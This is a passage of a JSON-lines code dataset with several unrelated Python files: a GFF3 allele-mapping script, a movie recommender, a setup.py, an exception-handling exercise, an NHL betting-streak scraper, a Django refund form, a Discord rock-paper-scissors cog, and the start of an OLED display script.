Insert size from SRA for the reads that will be used as input\n 3. Either \"gene\" or \"exon\" for which level of sequences to pull\n 4. Directory for where the output should go\n\n Output:\n 1. A map for a single loci to all its alleles\n 2. A map indicating any overlapping gene positions\n 3. Summary data on introns including locations and longest intron length \n\n Usage:\n extract_alleles.py --ea_input /path/to/list_input.tsv --gene_or_exon gene --insert 500 --out_dir /path/to/outfile.tsv\n\n Author: \n James Matsumura\n\"\"\"\n\nimport re,argparse\nfrom collections import defaultdict\nfrom shared_fxns import make_directory\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Script to map alleles across GFF3 file. 
Read the top of the file for more details.')\n parser.add_argument('--ea_input', '-eai', type=str, required=True, help='Path to a TSV list for references and isolates.')\n parser.add_argument('--insert', '-i',type=int, required=False, default=0, help='Insert size from SRA for the reads that will be used as input.')\n parser.add_argument('--gene_or_exon', '-ge',type=str, required=True, help='Either \"gene\" or \"exon\" for which level of sequences to pull.')\n parser.add_argument('--out_dir', '-o', type=str, required=False, default='.', help='Directory for where the output should go.')\n args = parser.parse_args()\n\n make_directory(args.out_dir)\n\n # dictionary where the key is the ID and the value is a list for ref/loc/coords \n allele_map = {} \n\n # Iterate over each reference/isolate\n with open(args.ea_input,'r') as i:\n for entry in i:\n entry = entry.rstrip()\n vals = entry.split('\\t')\n type = vals[0]\n gff3 = vals[1]\n name = vals[3]\n\n # Regardless of reference or isolate, all should be mapping to the same name\n # designated by the reference. \n allele_map = parse_gff3(gff3,allele_map,type,name,args.insert,args.gene_or_exon,args.out_dir)\n\n # Iterate over the final hash of lists and print out a TSV\n out = \"ea_map.tsv\"\n with open(out,'w') as o:\n for key,value in allele_map.items():\n vals = ('\\t').join(value)\n line = \"{0}\\t{1}\\n\".format(key,vals)\n o.write(line)\n\n\n# Arguments:\n# file = GFF3 file\n# allele_map = a dictionary with the reference ID/Name as the key and the values an allele tied to it\n# ref_or_iso = is this a reference or an isolate? This will potentially change the ID\n# name = prefix/name of isolate\n# insert = size of the insert to check for overlaps\n# out_dir = prefix for the output directory to write to\n# gene_or_exon = whether to parse out by genes or exons\ndef parse_gff3(file,allele_map,ref_or_iso,name,insert,gene_or_exon,out_dir):\n\n regex_for_name = r'.*Name=([a-zA-Z\\d_\\.\\-]+)'\n regex_for_gmap_name = r'.*ID=([a-zA-Z\\d_\\.\\-]+)'\n regex_for_ref_exon_name = r'exon\\_?([\\w\\.]+)[\\-:;]+'\n\n # Build a dictionary of all the loci and their positions to look for any\n # instances of overlap which may assist in deciding whether to filter\n # or not when it comes to assigning individual reads per locus. 
\n overlap_dict = defaultdict(list)\n intron_check = {}\n max_intron_length = {} # keep track, per allele, of the maximum intron length\n attr_name,id = (\"\" for i in range(2))\n\n with open(file,'r') as gff3:\n for line in gff3:\n if line.startswith('##FASTA'): # don't care about sequences\n # only process intron info if going by genes\n if gene_or_exon == 'gene':\n if len(intron_check[attr_name]['list']) > 1 and ref_or_iso == \"reference\": # one last check for last gene\n max_intron_length[attr_name]['max_list'] = calculate_max_intron_length(intron_check,attr_name)\n \n break # leave if in FASTA\n\n elif line.startswith('#'): # don't care about comments or header data\n pass\n else: # within the GFF3 9-column section\n ele = line.split('\\t')\n if ele[2] == gene_or_exon: # only process if it is a gene or exon\n source = ele[0]\n start = ele[3]\n stop = ele[4]\n strand = ele[6]\n\n id = \"{0}.{1}\".format(name,re.search(regex_for_gmap_name,ele[8]).group(1))\n\n if gene_or_exon == 'gene':\n if attr_name in intron_check and ref_or_iso == \"reference\": # make sure it's been initialized\n if len(intron_check[attr_name]['list']) > 1: # only need to process if more than one exon\n max_intron_length[attr_name]['max_list'] = calculate_max_intron_length(intron_check,attr_name)\n\n attr_name = re.search(regex_for_name,ele[8]).group(1) # extract the name from attr that links via GMAP\n\n overlap_dict[source].append(\"{0}:{1}:{2}\".format(start,stop,id))\n\n intron_check[attr_name] = {'list':[],'strand':\"\"}\n intron_check[attr_name]['strand'] = strand\n max_intron_length[attr_name] = {'max_list':[],'start_pos':0}\n max_intron_length[attr_name]['start_pos'] = ele[3]\n\n elif gene_or_exon == 'exon': \n if ele[8].startswith('ID=exon'):\n attr_name = re.search(regex_for_ref_exon_name,ele[8]).group(1)\n else:\n attr_name = re.search(regex_for_name,ele[8]).group(1)\n \n if attr_name not in allele_map: # initialize if not seen before\n allele_map[attr_name] = []\n\n allele_map[attr_name].append(\"{0}|{1}|{2}|{3}|{4}\".format(source,start,stop,strand,id))\n\n if ele[2] == 'exon' and gene_or_exon == 'gene':\n intron_check[attr_name]['list'].append(\"{0}:{1}\".format(ele[3],ele[4])) \n \n # Only do overlap and intron checks for the reference as we can't really\n # trust GMAP to capture these properly with the way it maps fragments of\n # genes. Don't worry about these aspects when pulling exons. \n if gene_or_exon == 'gene':\n if ref_or_iso == \"reference\":\n # Identify whether there is any overlap. If there is, print to STDOUT. \n # Despite the nested loops, this shouldn't be too bad since it's split\n # up by each GFF3 file. 
Doing it this way since the GFF3 files aren't \n # guaranteed to be in order and genes are not always going to overlap\n # in a consistent manner (some may span multiple, just 1 bp, etc.)\n overlap_set = set() # don't add duplicates\n overlap_out = \"{0}/overlap.tsv\".format(out_dir)\n with open(overlap_out,'a') as out:\n for k,v in overlap_dict.items():\n for j in range(0,len(v)):\n\n ele = v[j].split(':')\n jstart = int(ele[0])\n jstop = int(ele[1])\n jid = ele[2]\n\n for x in range(0,len(v)):\n if j != x: # only compare to other gene regions\n ele = v[x].split(\":\")\n xstart = int(ele[0])\n xstop = int(ele[1])\n xid = ele[2]\n pair = \"\"\n\n if xid < jid:\n pair = \"{0}{1}\".format(xid,jid)\n else:\n pair = \"{0}{1}\".format(jid,xid)\n \n if jstart < (xstart-insert) < jstop:\n if pair not in overlap_set:\n overlap_set.add(pair)\n out.write('{0}\\t{1}\\n'.format(jid,xid))\n elif jstart < (xstop+insert) < jstop: \n if pair not in overlap_set:\n overlap_set.add(pair)\n out.write('{0}\\t{1}\\n'.format(jid,xid))\n\n # Write out some output for intron length\n introns_out = \"{0}/intron_positions.tsv\".format(out_dir)\n with open(introns_out,'a') as out:\n for k in max_intron_length:\n if max_intron_length[k]['max_list']:\n out.write(\"{0}\\t{1}\\t{2}\\n\".format(k,max_intron_length[k]['start_pos'],\"\\t\".join(max_intron_length[k]['max_list'])))\n\n return allele_map\n\n\ndef calculate_max_intron_length(intron_dict,key):\n\n prev = -1 # previous end position\n max = 0 # maximum intron length found so far\n out_list = [0]\n\n if intron_dict[key]['strand'] == '-':\n\n for exon in reversed(intron_dict[key]['list']):\n out_list.append(exon)\n if prev == -1:\n prev = exon.split(\":\")[1]\n else:\n intron_length = int(exon.split(\":\")[0])-int(prev)\n if intron_length > max:\n max = intron_length\n prev = exon.split(\":\")[1]\n\n else:\n\n for exon in intron_dict[key]['list']:\n out_list.append(exon)\n if prev == -1:\n prev = exon.split(\":\")[1]\n else:\n intron_length = int(exon.split(\":\")[0])-int(prev)\n if intron_length > max:\n max = intron_length\n prev = exon.split(\":\")[1]\n \n out_list[0] = str(max) \n return out_list\n\n\nif __name__ == '__main__':\n main()","sub_path":"bin/extract_alleles.py","file_name":"extract_alleles.py","file_ext":"py","file_size_in_byte":11611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"187001838","text":"avaliacoesUsers = {'Ana': \n\t\t{'Freddy x Jason': 2.5, \n\t\t 'O Ultimato Bourne': 3.5,\n\t\t 'Star Trek': 3.0, \n 'Star Wars': 3.0,\n\t\t 'Exterminador do Futuro': 3.5, \n\t\t 'Norbit': 2.5},\n\t \n\t 'Marcos': \n\t\t{'Freddy x Jason': 3.0, \n\t\t 'O Ultimato Bourne': 3.5, \n\t\t 'Star Trek': 1.5, \n\t\t 'Star Wars': 3.0,\n 'Exterminador do Futuro': 5.0, \n\t\t 'Norbit': 3.5}, \n\n\t 'Pedro': \n\t {'Freddy x Jason': 2.5, \n\t\t 'O Ultimato Bourne': 3.0,\n 'Star Wars': 4.0,\n\t\t 'Exterminador do Futuro': 3.5},\n\t\t\t \n\t 'Claudia': \n\t\t{'O Ultimato Bourne': 3.5, \n\t\t 'Star Trek': 3.0,\n\t\t 'Star Wars': 4.5, \n\t\t 'Exterminador do Futuro': 4.0, \n\t\t 'Norbit': 2.5},\n\t\t\t\t \n\t 'Adriano': \n\t\t{'Freddy x Jason': 3.0, \n\t\t 'O Ultimato Bourne': 4.0, \n\t\t 'Star Trek': 2.0, \n 'Star Wars': 3.0,\n 'Exterminador do Futuro': 3.0, \n\t\t 'Norbit': 2.0}, \n\n\t 'Janaina': \n\t {'Freddy x Jason': 3.0, \n\t 'O Ultimato Bourne': 4.0,\n\t 'Star Wars': 3.0, \n\t 'Exterminador do Futuro': 5.0, \n\t 'Norbit': 3.5},\n\t\t\t \n\t 'Leonardo': \n\t {'O Ultimato Bourne':4.5,\n\t 'Exterminador do 
Futuro':4.0,\n 'Norbit':1.0}\n}\n\navaliacoesModel = {'Model':{'Freddy x Jason', \n\t\t 'O Ultimato Bourne',\n\t\t 'Star Trek',\n\t\t 'Star Wars',\n 'Exterminador do Futuro', \n\t\t 'Norbit'}\n }\n \navaliacoesMovies = {'Freddy x Jason': \n\t\t{'Ana': 2.5, \n\t\t 'Marcos:': 3.0 ,\n\t\t 'Pedro': 2.5, \n\t\t 'Adriano': 3.0, \n\t\t 'Janaina': 3.0 },\n\t \n\t 'O Ultimato Bourne': \n\t\t{'Ana': 3.5, \n\t\t 'Marcos': 3.5,\n\t\t 'Pedro': 3.0, \n\t\t 'Claudia': 3.5, \n\t\t 'Adriano': 4.0, \n\t\t 'Janaina': 4.0,\n\t\t 'Leonardo': 4.5 },\n\t\t\t\t \n\t 'Star Trek': \n\t\t{'Ana': 3.0, \n\t\t 'Marcos:': 1.5,\n\t\t 'Claudia': 3.0, \n\t\t 'Adriano': 2.0 },\n\t\n\t 'Exterminador do Futuro': \n\t\t{'Ana': 3.5, \n\t\t 'Marcos:': 5.0 ,\n\t\t 'Pedro': 3.5, \n\t\t 'Claudia': 4.0, \n\t\t 'Adriano': 3.0, \n\t\t 'Janaina': 5.0,\n\t\t 'Leonardo': 4.0},\n\t\t\t\t \n\t 'Norbit': \n\t\t{'Ana': 2.5, \n\t\t 'Marcos:': 3.0 ,\n\t\t 'Claudia': 2.5, \n\t\t 'Adriano': 2.0, \n\t\t 'Janaina': 3.5,\n\t\t 'Leonardo': 1.0},\n\t\t\t\t \n\t 'Star Wars': \n\t\t{'Ana': 3.0, \n\t\t 'Marcos:': 3.5,\n\t\t 'Pedro': 4.0, \n\t\t 'Claudia': 4.5, \n\t\t 'Adriano': 3.0, \n\t\t 'Janaina': 3.0}\n}\n \n##Fazer uma função de inserção de usuário\n##Fazer um sistema que pergunta se o usuário existe \n##Excluir um usuário do sistema \n \nfrom math import sqrt\n\ndef knn(base,user1,user2):\n si = {}\n for item in base[user1]:\n if item in base[user2]: \n si[item] = 1\n \n if len(si)==0: \n return 0\n \n soma = sum([pow(base[user1][item] - base[user2][item], 2)\n for item in base[user1] if item in base[user2]])\n return 1/(1+sqrt(soma))\n\ndef getSim(base,user):\n sim = [(knn(base,user, users), users) \n for users in base if users != user]\n sim.sort()\n sim.reverse()\n return sim [0:20]\n\ndef getRecomUser(base, user):\n totais = {}\n somaSim = {}\n for users in base:\n if users == user: continue\n sim = knn(base,user,users)\n\n if sim <= 0: continue\n \n for item in base[users]:\n if item not in base[user]:\n totais.setdefault (item, 0)\n totais[item]+= base[users][item]*sim\n somaSim.setdefault(item, 0)\n somaSim[item]+= sim\n \n rankings=[(total/somaSim[item], item) for item, total in totais.items()]\n rankings.sort()\n rankings.reverse()\n return rankings[0:20] \n\ndef loadMovieLens(path='C:/ml-100k'):\n movies = {}\n for linha in open(path + '/u.item'):\n (id, titulo) = linha.split('|')[0:2]\n movies[id] = titulo\n \n base = {}\n for linha in open(path + '/u.data'):\n (user, idmovies,nota,tempo) = linha.split('\\t')\n base.setdefault(user,{})\n base[user][movies[idmovies]] = float(nota)\n return base\n\ndef calItensSim(base):\n result = {}\n for item in base:\n notas = getSim(base, item)\n result[item] = notas\n return result\n\ndef getRecomItens(baseUser, simItens, user):\n notasUser = baseUser[user]\n notas={}\n totalSim={}\n #for(item , nota) in notasUser.item():\n for (item,nota) in notasUser.items():\n for(sim , item2) in simItens[item]:\n if item2 in notasUser: continue\n notas.setdefault(item2, 0)\n notas[item2] += sim * nota\n totalSim.setdefault(item2, 0)\n totalSim[item2] += sim\n rankings=[(score/totalSim[item],item) for item, score in notas.items()]\n rankings.sort()\n rankings.reverse()\n return rankings","sub_path":"Resources - SR/recomendation.py","file_name":"recomendation.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"566163475","text":"\"\"\" setup.py - Script to install package using distutils\n\nFor help options run:\n$ 
python setup.py help\n\n\"\"\"\n#Author: Ian Huston\n\n\nfrom setuptools import setup\nimport re\nimport ast\n\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\nwith open('getinspire/getinspire.py', 'rb') as f:\n version = str(ast.literal_eval(_version_re.search(f.read().decode('utf-8')).group(1)))\n\n\nsetup_args = dict(name='getinspire',\n version=version,\n author='Diego Restrepo',\n author_email='diego.restrepo@gmail.com',\n url='https://github.com/rescolo/getinspire',\n packages=['getinspire'],\n install_requires=['pybtex'],\n entry_points={\n 'console_scripts': 'getinspire = getinspire.getinspire:getinspire_main'\n },\n zip_safe=False,\n license=\"Modified BSD license\",\n description=\"\"\"getinspire queries the INSPIRE HEP database and returns to fill the bibtex o bibitem records of some LaTeX file \"\"\",\n long_description=open('README.rst').read(),\n classifiers=[\"Topic :: Utilities\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.2\",\n ],\n )\n\nif __name__ == \"__main__\":\n setup(**setup_args)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"482448882","text":"\n\n# NO:4 - Write example program to re-raised exception and AssertError (self-study) in Python. \n\ntry:\n \n try:\n a=int(input('Enter your age :'))\n if a>15:\n raise ValueError('Invalid number') \n except ValueError as ve:\n print(ve)\n raise\n else:\n print('Valid number')\nexcept AssertionError as ae:\n print(ae)\nexcept ValueError as ve:\n print('re-rased exception',ve)","sub_path":"Assert.py.py","file_name":"Assert.py.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"438624876","text":"import requests\nfrom bs4 import BeautifulSoup\nimport datetime\nimport os\nimport sys\n\n# Script for determining which games of the day fit Prof MJ (David-MJ) NHL streak system\n# System: Bet on team with losing streak >= 1 playing team with winning streak >= 4\n# Script writes and/or prints (depending on global variable settings) all games that fit streak\n# Will output strings in form of Away_Nickname,Home_Nickname,Home_Line,Bet_Team,Bet_Code\n# Where Bet_Code = {0 if no bet (should not be shown), 1 if home team is losing streak, 2 if away team is losing streak}\n__author__ = [\"rssawyer\"]\n\n# Global variables that can be fine-tuned\nLOSING_STREAK_MINIMUM = 2\nWINNING_STREAK_MINIMUM = 2\nMINIMUM_ODDS = 2.2\nWRITING = True\nOUTPUT_FILENAME = \"NHL-David-MJ-Streak-System.csv\"\nPRINTING = True\nSPORT = 'nhl'\n\n\n# Quick data structure for storing streak category (determined by minimums of global variables)\nclass NHL_Team:\n def __init__(self, input_name, streak_category):\n self.name = input_name\n self.category = streak_category\n\n\n# Determining if a matchup should be bet given teams and their streak category\ndef system_matchup(Away_team, Home_team):\n if Away_team.category == \"Losing\" and Home_team.category == \"Winning\":\n return 2, Away_team.name\n elif Away_team.category == \"Winning\" and Home_team.category == \"Losing\":\n return 1, Home_team.name\n else:\n return 0, \"No Bet\"\n\n\n# Function for converting teams from ESPN Standings names to ESPN Matchup 
names (essentially location -> nickname)\ndef map_name_standings_to_matchup(name):\n try:\n dash_index = name.index('-')\n name = name[dash_index+2:]\n except ValueError:\n pass\n NHL_dictionary = {\"Montreal\":\"Canadiens\",\n \"Toronto\":\"Maple Leafs\",\n \"Ottawa\":\"Senators\",\n \"Boston\":\"Bruins\",\n \"Tampa Bay\":\"Lightning\",\n \"Florida\":\"Panthers\",\n \"Buffalo\":\"Sabres\",\n \"Detroit\":\"Red Wings\",\n \"Washington\":\"Capitals\",\n \"Pittsburgh\":\"Penguins\",\n \"Columbus\":\"Blue Jackets\",\n \"NY Rangers\":\"Rangers\",\n \"NY Islanders\":\"Islanders\",\n \"Carolina\":\"Hurricanes\",\n \"Philadelphia\":\"Flyers\",\n \"New Jersey\":\"Devils\",\n \"Chicago\":\"Blackhawks\",\n \"Minnesota\":\"Wild\",\n \"St. Louis\":\"Blues\",\n \"Nashville\":\"Predators\",\n \"Winnipeg\":\"Jets\",\n \"Dallas\":\"Stars\",\n \"Colorado\":\"Avalanche\",\n \"Anaheim\":\"Ducks\",\n \"Edmonton\":\"Oilers\",\n \"San Jose\":\"Sharks\",\n \"Calgary\":\"Flames\",\n \"Los Angeles\":\"Kings\",\n \"Vancouver\":\"Canucks\",\n \"Arizona\":\"Coyotes\",\n\t\t\t\t\t \"Vegas\":\"Golden Knights\"}\n try:\n mapped_name = NHL_dictionary[name]\n except KeyError:\n mapped_name = \"Not Found\"\n return mapped_name\n\n\n# Using global streak minimums to determine team's streak category from ESPN Standings table (e.g. Won 5)\ndef convert_word_category(cell_text):\n if cell_text[0] == \"L\" and int(cell_text.split(\" \")[1]) >= LOSING_STREAK_MINIMUM:\n category = \"Losing\"\n elif cell_text[0] == \"W\" and int(cell_text.split(\" \")[1]) >= WINNING_STREAK_MINIMUM:\n category = \"Winning\"\n else:\n category = \"None\"\n return category\n\n\n# Returns dictionary of (Name, Team_object) for use in determining actionable matchups from ESPN Standings\ndef get_team_streak_data(sport=\"nhl\"):\n return_dict = dict()\n url = \"http://www.espn.com/%s/standings\" % sport\n session = requests.Session()\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)\"\n \" Chrome/47.0.2526.111 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;\"\n \"q=0.9,image/webp,*/*;q=0.8\"}\n req = session.get(url, headers=headers)\n bsObj = BeautifulSoup(req.text, \"html.parser\")\n\n standings = bsObj.find(name=\"table\", class_=\"tablehead\")\n rows = standings.find_all('tr')\n\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n team_name = map_name_standings_to_matchup(cols[0])\n if team_name != \"Not Found\":\n return_dict[team_name] = NHL_Team(team_name, convert_word_category(cols[15]))\n\n return return_dict\n\n\ndef convert_game_to_string(html_game, team_data):\n try:\n links = html_game.find_all(name='a')\n away_team = links[0].text.strip()\n home_team = links[1].text.strip()\n line = html_game.find(name=\"div\", class_=\"expand-gameLinks\").text.strip().split(\" \")[-1]\n try:\n int(line)\n except ValueError:\n line = \"None\"\n bet_indicator, bet_team = system_matchup(team_data[away_team], team_data[home_team])\n return \"%s,%s,%s,%s,%s\" % (away_team, home_team, line, bet_team, bet_indicator)\n except AttributeError:\n return \"N,N,N,N,0\"\n except IndexError:\n return \"N,N,N,N,0\"\n\n\ndef calculate_payouts(home_moneyline):\n if home_moneyline < 0:\n home_payout = 100 / abs(home_moneyline)\n away_payout = 1 / home_payout - 0.15\n else:\n home_payout = home_moneyline / 100\n away_payout = 1 / home_payout - 0.15\n return home_payout + 1, away_payout + 1\n\n\n# Uses predetermined betting code (0 = None, 1 = Home is 
losing streak, 2 = Away is losing streak)\ndef actionable(game_string):\n    split = game_string.split(\",\")\n    try:\n        home_payout, away_payout = calculate_payouts(int(split[-3]))\n        if int(split[-1]) == 1 and home_payout > MINIMUM_ODDS:\n            return True\n        elif int(split[-1]) == 2 and away_payout > MINIMUM_ODDS:\n            return True\n        else:\n            return False\n    except ValueError:\n        return False\n\n\n\n# Gets today's matchups (and lines) from ESPN and returns actionable games\n# Returns list of actionable games in format Away_Name,Home_Name,Line,Bet_Team,Bet_Amount\n# Line is relative to home, if available on ESPN Matchup page\ndef get_matchup_data(team_data, sport=\"nhl\"):\n    url = \"http://www.espn.com/%s/scoreboard\" % sport\n    session = requests.Session()\n    headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)\"\n                             \" Chrome/47.0.2526.111 Safari/537.36\",\n               \"Accept\": \"text/html,application/xhtml+xml,application/xml;\"\n                         \"q=0.9,image/webp,*/*;q=0.8\"}\n    req = session.get(url, headers=headers)\n    bsObj = BeautifulSoup(req.text, \"html.parser\")\n\n    games = bsObj.find_all(name=\"div\", class_=\"mod-content\")\n    actionable_games = []\n    for game in games:\n        game_string = convert_game_to_string(game, team_data)\n        if actionable(game_string):\n            actionable_games.append(game_string)\n\n    return actionable_games\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) > 2:\n        LOSING_STREAK_MINIMUM = int(sys.argv[1])\n        WINNING_STREAK_MINIMUM = int(sys.argv[2])\n    print(\"Using %d losing streak and %d winning streak:\" % (LOSING_STREAK_MINIMUM, WINNING_STREAK_MINIMUM))\n    team_info = get_team_streak_data(sport=SPORT)\n    if len(team_info.keys()) != 31:\n        print(\"Number of teams incorrect\")\n    bet_games = get_matchup_data(team_info, sport=SPORT)\n\n    if WRITING:\n        if not os.path.exists(OUTPUT_FILENAME):\n            write_file = open(OUTPUT_FILENAME, mode='a')\n            header = \"Date,Sport,AwayNickname,HomeNickname,HomeLine,BetTeam,BetCode\\n\"\n            write_file.write(header)\n        else:\n            write_file = open(OUTPUT_FILENAME, mode='a')\n        date = datetime.date.today()\n        for game in bet_games:\n            write_file.write(str(date)+\",\"+SPORT+\",\"+game+\"\\n\")\n        write_file.close()\n\n    if PRINTING:\n        if len(bet_games) < 1:\n            print(\"No Games Actionable\")\n        else:\n            for game in bet_games:\n                print(\"Bet Game: %s\" % game)\n","sub_path":"NHL_Streak_System.py","file_name":"NHL_Streak_System.py","file_ext":"py","file_size_in_byte":8341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"440368593","text":"\"\"\"Module containing forms for the refund app.\"\"\"\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom localflavor.generic.validators import BICValidator, IBANValidator\n\nfrom pat.forms import UserChoiceField\nfrom refund.models import Refund\n\n\nclass RefundForm(forms.ModelForm):\n    \"\"\"The basic refund Form Class.\"\"\"\n    department_leader = UserChoiceField(User.objects.filter(is_staff=True))\n\n    # pylint: disable=too-few-public-methods\n    class Meta:\n        \"\"\"Meta class connecting the model to the model form.\"\"\"\n        model = Refund\n        fields = [\n            \"department_leader\",\n            \"cost_centre\",\n            \"project\",\n            \"refund_type\",\n            \"bank_account_owner\",\n            \"bank_account_iban\",\n            \"bank_account_bic\"\n        ]\n\n        for i in range(10):\n            fields.append(\"receipt_{}_picture\".format(i))\n            fields.append(\"receipt_{}_amount\".format(i))\n\n        localized_fields 
= \"__all__\"\n\n def disable(self):\n \"\"\"Make all fields disabled (=read-only).\"\"\"\n for _, field in self.fields.items():\n field.disabled = True\n\n def clean(self):\n \"\"\"Clean and validate the form data.\"\"\"\n data = super().clean()\n\n # When `bank account` is chosen as refund type, three additional fields must be validated:\n # Bank account owner, IBAN and BIC.\n if data.get(\"refund_type\") == \"bank_account\":\n if not data.get(\"bank_account_owner\"):\n self.add_error(\"bank_account_owner\", _(\"This field is required.\"))\n\n if data.get(\"bank_account_iban\"):\n iban_validator = IBANValidator()\n try:\n iban_validator(data.get(\"bank_account_iban\"))\n except ValidationError:\n self.add_error(\"bank_account_iban\", _(\"A valid IBAN is required.\"))\n else:\n self.add_error(\"bank_account_iban\", _(\"This field is required.\"))\n\n if data.get(\"bank_account_bic\"):\n bic_validator = BICValidator()\n try:\n bic_validator(data.get(\"bank_account_bic\"))\n except ValidationError:\n self.add_error(\"bank_account_bic\", _(\"A valid BIC is required.\"))\n else:\n self.add_error(\"bank_account_bic\", _(\"This field is required.\"))\n\n # Receipt validation\n if not any([data.get(\"receipt_{}_picture\".format(i)) for i in range(10)]):\n self.add_error(\"receipt_0_picture\", _(\"At least one receipt is required.\"))\n\n for i in range(10):\n if data.get(f\"receipt_{i}_picture\") and not data.get(f\"receipt_{i}_amount\"):\n self.add_error(f\"receipt_{i}_picture\",\n _(\"The amount for this receipt is required.\"))\n elif data.get(f\"receipt_{i}_amount\") and not data.get(f\"receipt_{i}_picture\"):\n self.add_error(f\"receipt_{i}_amount\", _(\"The receipt for this amount is required.\"))\n","sub_path":"refund/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"180307603","text":"#put all the fun commands here\n#IMPORTS\nimport discord\n\nfrom discord.ext import commands\n\nimport asyncio\nimport random\n\n#VARIABLES\nOPTIONS = ['Rock!', 'Paper!', 'Scissors!']\n\n\nclass Fun(commands.Cog):\n \"\"\"Fun commands like quick bot responses or simple games. ex: rock paper scissors\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(aliases=[\"rps\"])\n async def rockpaperscissors(self, ctx):\n \"\"\"A nice game of Rock Paper Scissors. - Alias: rps\"\"\"\n VERIFY = False\n member = ctx.author\n await ctx.send('Thinking of my answer ...')\n await asyncio.sleep(0.8)\n await ctx.send('Got it! Awaiting response.')\n MESSAGE = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author)\n RESPONSE = random.randint(0, 2)\n await ctx.send(OPTIONS[RESPONSE])\n await asyncio.sleep(0.6)\n try:\n while True:\n MESSAGE = await self.bot.wait_for('message', check=(lambda message: message.author == ctx.author),\n timeout=30)\n if MESSAGE.content == \"rock\" or MESSAGE.content == \"Rock\" or MESSAGE.content == \"paper\" or MESSAGE.content == \"Paper\" or MESSAGE.content == \"scissors\" or MESSAGE.content == \"Scissors\":\n break\n else:\n await ctx.send(\"That's not an answer you frick. 
Put in either rock, paper or scissors.\")\n MESSAGE = \" \"\n except asyncio.TimeoutError:\n await ctx.send(f\"{ctx.author.mention} timed out!\")\n return\n if MESSAGE.content == \"rock\" and RESPONSE == 2 or MESSAGE.content == \"Rock\" and RESPONSE == 2:\n await ctx.send(\"https://tenor.com/view/the-goon-win-you-won-willy-wonka-oompa-loompa-fc-gif-14046847\")\n elif MESSAGE.content == \"paper\" and RESPONSE == 0 or MESSAGE.content == \"Paper\" and RESPONSE == 0:\n await ctx.send(\"https://tenor.com/view/the-goon-win-you-won-willy-wonka-oompa-loompa-fc-gif-14046847\")\n elif MESSAGE.content == \"scissors\" and RESPONSE == 1 or MESSAGE.content == \"Scissors\" and RESPONSE == 1:\n await ctx.send(\"https://tenor.com/view/the-goon-win-you-won-willy-wonka-oompa-loompa-fc-gif-14046847\")\n elif MESSAGE.content == \"rock\" and RESPONSE == 0 or MESSAGE.content == \"Rock\" and RESPONSE == 0:\n await ctx.send(\"https://tenor.com/view/monty-python-draw-gif-5447899\")\n elif MESSAGE.content == \"paper\" and RESPONSE == 1 or MESSAGE.content == \"Paper\" and RESPONSE == 1:\n await ctx.send(\"https://tenor.com/view/monty-python-draw-gif-5447899\")\n elif MESSAGE.content == \"scissors\" and RESPONSE == 2 or MESSAGE.content == \"Scissors\" and RESPONSE == 2:\n await ctx.send(\"https://tenor.com/view/monty-python-draw-gif-5447899\")\n else:\n await ctx.send(\"https://tenor.com/view/you-lose-good-day-sir-gif-7465431\")\n\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","sub_path":"src/fullyautomatednutcracker/cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"181755661","text":"import time\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nimport subprocess\nRST = None\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\n\n# 128x32 display with hardware I2C:\ndisp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)\ndisp.begin()\n# Clear display.\ndisp.clear()\ndisp.display()\nwidth = disp.width\nheight = disp.height\nimage = Image.new('1', (width, height))\ndraw = ImageDraw.Draw(image)\ndraw.rectangle((0,0,width,height), outline=0, fill=0)\npadding = 0\ntop = padding\nbottom = height-padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n# Load default font.\nfont = ImageFont.load_default()\n# Alternatively load a TTF font. 
